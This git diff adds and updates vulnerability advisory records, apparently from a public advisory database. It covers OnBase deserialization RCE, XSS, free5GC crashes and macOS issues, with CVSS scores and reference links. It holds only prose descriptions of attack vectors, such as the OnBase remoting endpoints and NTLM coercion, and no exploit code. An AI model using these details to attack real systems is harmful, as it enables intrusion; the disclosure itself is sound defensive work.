b/advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5wr5-vxhh-x7gm", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2026-26221" + ], + "details": "Hyland OnBase contains an unauthenticated .NET Remoting exposure in the OnBase Workflow Timer Service (Hyland.Core.Workflow.NTService.exe). An attacker who can reach the service can send crafted .NET Remoting requests to default HTTP channel endpoints on TCP/8900 (e.g., TimerServiceAPI.rem and TimerServiceEvents.rem for Workflow) to trigger unsafe object unmarshalling, enabling arbitrary file read/write. By writing attacker-controlled content into web-accessible locations or chaining with other OnBase features, this can lead to remote code execution. The same primitive can be abused by supplying a UNC path to coerce outbound NTLM authentication (SMB coercion) to an attacker-controlled host.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26221" + }, + { + "type": "WEB", + "url": "https://community.hyland.com/resources/bulletins-and-notices/223223-security-update-onbase-workflow-timer-service-bulletin-ob2025-03" + }, + { + "type": "WEB", + "url": "https://www.hyland.com/en/solutions/products/onbase" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/hyland-onbase-timer-services-unauthenticated-net-remoting-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json b/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json new file mode 100644 index 0000000000000..4b374e9eea703 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7v9f-f4qv-fcxh", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-1790" + ], + "details": "Local privilege escalation in Genetec Sipelia Plugin. An authenticated low-privileged Windows user could exploit this vulnerability to gain elevated privileges on the affected system.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:H/IR:H/AR:H/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:H/MVI:H/MVA:H/MSC:X/MSI:H/MSA:H/S:P/AU:N/R:X/V:C/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1790" + }, + { + "type": "WEB", + "url": "https://techdocs.genetec.com/r/en-US/Security-Updates-for-SipeliaTM-2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-250" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json index 583c0515f5221..26d18da71a8ff 100644 --- a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json +++ b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json @@ -37,7 +37,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-377" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json index 71b182c662e59..3fdb1c5373ebf 100644 --- a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json +++ b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json @@ -45,7 +45,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-22" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json b/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json new file mode 100644 index 0000000000000..566f6f187b641 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgmm-x5ww-q5cr", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2026-26226" + ], + "details": "beautiful-mermaid versions prior to 0.1.3 contain an SVG attribute injection issue that can lead to cross-site scripting (XSS) when rendering attacker-controlled Mermaid diagrams. User-controlled values from Mermaid style and classDef directives are interpolated into SVG attribute values without proper escaping, allowing crafted input to break out of an attribute context and inject arbitrary SVG elements/attributes into the rendered output. When the generated SVG is embedded in a web page, this can result in script execution in the context of the embedding origin.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26226" + }, + { + "type": "WEB", + "url": "https://github.com/lukilabs/beautiful-mermaid/pull/8" + }, + { + "type": "WEB", + "url": "https://github.com/lukilabs/beautiful-mermaid/releases/tag/v0.1.3" + }, + { + "type": "WEB", + "url": "https://neo.projectdiscovery.io/share/cec71dc7-a8eb-417e-b8b4-666644796c1e" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/beautiful-mermaid-svg-attribute-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json index 2318643dfd18f..bce80abbf7b42 100644 --- a/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json +++ b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cm39-88fp-pv6j", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20624" ], "details": "An injection issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json b/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json new file mode 100644 index 0000000000000..c9d4b3634317b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq6p-4h82-858f", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70122" + ], + "details": "A heap buffer overflow vulnerability in the UPF component of free5GC v4.0.1 allows remote attackers to cause a denial of service via a crafted PFCP Session Modification Request. The issue occurs in the SDFFilterFields.UnmarshalBinary function (sdf-filter.go) when processing a declared length that exceeds the actual buffer capacity, leading to a runtime panic and UPF crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70122" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/746" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json index 37b01af86dc3f..3ed2ead753663 100644 --- a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json +++ b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json index 6f87148c28743..109964fac8eab 100644 --- a/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json +++ b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h6jx-x5f4-qmj9", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20623" ], "details": "A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26.3. An app may be able to access protected user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json b/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json index f2448d2f4681c..6a6a16057b1db 100644 --- a/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json +++ b/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h892-rh45-x8jp", - "modified": "2026-02-13T06:30:48Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-13T06:30:48Z", "aliases": [ "CVE-2025-15520" ], "details": "The RegistrationMagic WordPress plugin before 6.0.7.2 checks nonces but not capabilities, allowing for the disclosure of some sensitive data to subscribers and above.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T06:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json b/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json new file mode 100644 index 0000000000000..85d71bffe0028 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j98c-62jj-x3h3", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70123" + ], + "details": "An improper input validation and protocol compliance vulnerability in free5GC v4.0.1 allows remote attackers to cause a denial of service. The UPF incorrectly accepts a malformed PFCP Association Setup Request, violating 3GPP TS 29.244. This places the UPF in an inconsistent state where a subsequent valid PFCP Session Establishment Request triggers a cascading failure, disrupting the SMF connection and causing service degradation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70123" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/745" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json index 200deaa254608..3092e58eb79b4 100644 --- a/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json +++ b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jhq4-533p-8p4c", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2026-20608" ], "details": "This issue was addressed through improved state management. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json index 6f0497ef22ac3..21e93d4d54400 100644 --- a/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json +++ b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json @@ -30,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json index fd782e26d81f6..eddabd2081f8b 100644 --- a/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json +++ b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p47v-wp9g-8362", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20609" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json index 1e43ff6433e4b..b6d3c0bc1c860 100644 --- a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json +++ b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p5cr-gq3j-93c4", - "modified": "2026-02-13T00:32:51Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-13T00:32:51Z", "aliases": [ "CVE-2025-70845" ], "details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) exists in the /setting/ page where the \"intro\" field is not properly sanitized or escaped.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T22:16:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json index d4716738bd91d..372a3a4a8ad50 100644 --- a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json +++ b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p5wr-5p37-2wm6", - "modified": "2026-02-07T00:30:27Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-07T00:30:27Z", "aliases": [ "CVE-2026-1731" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://beyondtrustcorp.service-now.com/csm?id=csm_kb_article&sysparm_article=KB0023293" }, + { + "type": "WEB", + "url": "https://github.com/win3zz/CVE-2026-1731" + }, { "type": "WEB", "url": "https://www.beyondtrust.com/trust-center/security-advisories/bt26-02" diff --git a/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json new file mode 100644 index 0000000000000..a1ff3a4c32013 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqhc-37jx-7gh5", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70095" + ], + "details": "A cross-site scripting (XSS) vulnerability in the item management and sales invoice function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70095" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70095.md" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json new file mode 100644 index 0000000000000..b61da74c7afe4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3p8-h9vv-9cqc", + "modified": "2026-02-13T18:31:24Z", + "published": "2026-02-13T18:31:24Z", + "aliases": [ + "CVE-2025-70093" + ], + "details": "An issue in OpenSourcePOS v3.4.1 allows attackers to execute arbitrary code via returning a crafted AJAX response.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70093" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos/pull/4357" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70093.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json new file mode 100644 index 0000000000000..576b5627e73f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwfj-gc28-j2fg", + "modified": "2026-02-13T18:31:24Z", + "published": "2026-02-13T18:31:24Z", + "aliases": [ + "CVE-2025-70091" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Customers function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Phone Number parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70091" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70091.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json new file mode 100644 index 0000000000000..d7196d2e1ca2c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7w9-2vjv-7r67", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2026-2026" + ], + "details": "A vulnerability has been identified where weak file permissions in the Nessus Agent directory on Windows hosts could allow unauthorized access, potentially permitting Denial of Service (DoS) attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2026" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2026-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json new file mode 100644 index 0000000000000..24f82d3dbbe7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x3j4-874w-h7pv", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70121" + ], + "details": "An array index out of bounds vulnerability in the AMF component of free5GC v4.0.1 allows remote attackers to cause a denial of service via a crafted 5GS Mobile Identity in a NAS Registration Request message. The issue occurs in the GetSUCI method (NAS_MobileIdentity5GS.go) when accessing index 5 of a 5-element array, leading to a runtime panic and AMF crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70121" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/747" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json index f5c1fe7f502f8..175244e5405e2 100644 --- a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json +++ b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xrqq-m9vv-pq36", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20619" ], "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" From 767802338fa8c1dbd8944581598134d805b99b23 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 19:45:13 +0000 Subject: [PATCH 11/36] Publish GHSA-qvhc-9v3j-5rfw --- 